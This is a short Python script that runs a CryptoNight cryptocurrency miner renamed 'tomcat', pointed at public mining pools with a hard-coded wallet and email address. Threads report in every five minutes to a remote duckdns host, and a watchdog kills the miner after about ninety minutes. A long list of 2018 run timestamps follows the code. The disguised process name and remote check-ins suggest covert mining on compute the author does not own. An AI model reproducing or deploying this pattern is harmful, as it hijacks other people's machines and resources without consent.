import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:13:04.148362
#2018-02-17 16:01:04.670793
#2018-02-17 17:49:04.584507
#2018-02-17 19:36:04.961174
#2018-02-17 21:24:06.793784
#2018-02-17 23:08:03.587279
#2018-02-18 00:56:04.134926
#2018-02-18 02:44:01.469127
#2018-02-18 04:34:07.343274
#2018-02-18 06:25:05.833097
#2018-02-18 08:13:05.253118
#2018-02-18 10:01:05.985138
#2018-02-18 11:48:01.923853
#2018-02-18 13:33:04.378709
#2018-02-18 15:23:03.613362
#2018-02-18 17:12:06.571732
#2018-02-18 19:00:03.684701
#2018-02-18 20:47:02.069679
#2018-02-18 22:33:04.116874
#2018-02-19 00:21:05.835465
#2018-02-19 02:07:05.729586
#2018-02-19 03:54:04.167496
#2018-02-19 05:39:05.154504
#2018-02-19 07:27:06.260634
#2018-02-19 09:17:05.723230
#2018-02-19 11:06:09.484284
#2018-02-19 12:53:01.707877
#2018-02-19 14:40:07.184238
#2018-02-19 16:27:07.163809
#2018-02-19 18:13:06.241357
#2018-02-19 20:00:05.337012
#2018-02-19 21:48:02.143273
#2018-02-19 23:35:05.834471
#2018-02-20 01:20:07.424300
#2018-02-20 03:10:06.786894
#2018-02-20 04:56:05.628022
#2018-02-20 06:40:05.666095
#2018-02-20 08:26:05.027804
#2018-02-20 10:11:04.323354
#2018-02-20 11:55:07.316267
#2018-02-20 13:42:07.822196
#2018-02-20 15:26:06.425067
#2018-02-20 17:11:09.704962
#2018-02-20 19:02:11.305085
#2018-02-20 20:53:01.980576
#2018-02-20 22:37:05.782278
#2018-02-21 00:18:04.989215
#2018-02-21 02:04:01.300641
#2018-02-21 03:51:03.988156
#2018-02-21 05:37:08.100404
#2018-02-21 07:26:01.737962
#2018-02-21 09:10:04.946186
#2018-02-21 10:58:07.710328
#2018-02-21 12:46:06.056964
#2018-02-21 14:34:04.996853
#2018-02-21 16:20:05.863017
#2018-02-21 18:09:04.458323
#2018-02-21 19:56:02.016674
#2018-02-21 21:43:06.882618
#2018-02-21 23:31:04.326626
#2018-02-22 01:17:07.905533
#2018-02-22 03:08:02.204380
#2018-02-22 04:52:05.458640
#2018-02-22 06:37:06.528211
#2018-02-22 08:25:06.762292
#2018-02-22 08:26:08.125802
#2018-02-22 10:11:08.767606
#2018-02-22 11:42:01.964109
#2018-02-22 13:17:01.964124
#2018-02-22 14:50:07.047083
#2018-02-22 16:22:09.958634
#2018-02-22 17:56:12.800585
#2018-02-22 19:32:01.919550
#2018-02-22 21:11:07.407094
#2018-02-22 22:39:04.960019
#2018-02-23 00:14:01.657001
#2018-02-23 01:51:04.027857
#2018-02-23 03:22:06.445045
#2018-02-23 04:56:03.704785
#2018-02-23 06:32:07.297640
#2018-02-23 08:12:06.442477
#2018-02-23 10:16:08.518493
#2018-02-23 11:41:08.817797
#2018-02-23 13:03:07.645132
#2018-02-23 14:27:06.474859
#2018-02-23 16:06:06.825521
#2018-02-23 17:34:04.793284
#2018-02-23 19:09:08.742865
#2018-02-23 20:44:10.880315
#2018-02-23 22:19:01.733761
#2018-02-23 23:52:04.400505
#2018-02-24 01:26:06.909209
#2018-02-24 03:02:07.116481
#2018-02-24 04:48:06.224027
#2018-02-24 06:34:06.963941
#2018-02-24 08:23:06.403902
#2018-02-24 10:06:07.101793
#2018-02-24 12:04:03.799606
#2018-02-24 13:52:02.071843
#2018-02-24 15:41:07.243801
#2018-02-24 17:35:05.448875
#2018-02-24 19:21:06.933744
#2018-02-24 21:12:01.641363
#2018-02-24 23:45:07.312471
#2018-02-25 03:06:05.713561
#2018-02-25 06:43:06.718882